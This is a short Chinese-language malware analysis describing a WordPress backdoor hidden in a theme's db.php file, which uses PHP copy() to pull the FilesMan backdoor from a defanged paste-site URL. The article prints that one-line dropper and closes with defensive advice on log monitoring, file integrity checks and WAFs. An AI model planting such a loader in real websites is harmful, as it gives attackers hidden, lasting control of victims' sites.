後門使用貼上網址來儲存payload
網站後門
後門是攻擊者故意留下用於之後訪問站點的惡意軟體。黑客喜歡在不同的位置注入程式碼來增加保持對網站控制權的機會,這樣就可以繼續感染受害者網站了。
今年都在討論解碼含有PHP函式的複雜惡意軟體的新方法。常見的PHP函式有:
·eval, 把一段字串當作PHP語句來執行
· create_function, 主要用來建立匿名函式
· preg_replace, 正則查詢替換函式
· assert, 斷言函式
· base64_decode.
根據最新的網站被黑報告,過去的一年:
· 被黑的網站中有71%隱藏有基於PHP的後門。
· 這些後門的有效性來源於大多數網站掃描技術的繞過。
不常見的後門
不常見的後門看似合法程式碼,大多數的惡意軟體掃描器都無法掃描到。
在應急響應調查中,研究人員發現一個小的、簡單、但有效的後門。
後門的內容會上傳到wp-content/themes/buildup/db.php檔案,看起來是這樣的:
<?php if ( @copy('hxxps://paste[.]ee/r/3TwsC/0', 'db.php') ) { echo "Copy_success"; }else{ echo "Copy_failed"; } ?>
這一段程式碼會從hxxps://paste[.].ee處下載全部的惡意軟體。
有一款免費的工具會混淆下載的程式碼,這樣的工具對惡意軟體開發者來說是很容易的。研究人員還發現一些合法的程式碼也會使用這種免費的工具。
混淆的程式碼從網站下載惡意軟體
反混淆後就獲得了可讀的程式碼:
從中可以看出這是FilesMan後門的一個副本,FilesMan後門是隱藏在檔案系統中的後門,會使其在不訪問伺服器或日誌的情況下很難被發現。
如何避免網站後門?
後門很難發現,也很難去除。首先,研究人員建議經常性的監控日誌是否有不常見的行為。其次,為了避免網站被感染,研究人員建議應用檔案完整性監控和WAF這樣的安全措施。